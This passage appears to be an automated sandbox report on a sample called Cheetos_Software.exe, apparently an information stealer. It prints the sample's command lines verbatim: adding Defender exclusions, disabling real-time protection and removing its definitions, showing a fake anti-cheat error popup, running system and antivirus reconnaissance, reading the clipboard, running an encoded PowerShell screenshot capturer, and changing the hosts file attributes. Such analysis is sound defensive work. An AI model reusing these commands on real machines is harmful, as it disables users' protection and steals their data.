Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4092 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 4092 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 3164 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4496 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4496 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3648 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3648 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 900 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 900 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3164 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1984 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3164 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1384 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3164 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4384 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4384 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1100 wrote to memory of 1416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1100 wrote to memory of 1416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4672 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2920 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2920 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3264 wrote to memory of 964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3264 wrote to memory of 964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1432 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1432 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2652 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3164 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 924 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3164 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3164 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2988 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌​‏ .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌​‏ .scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

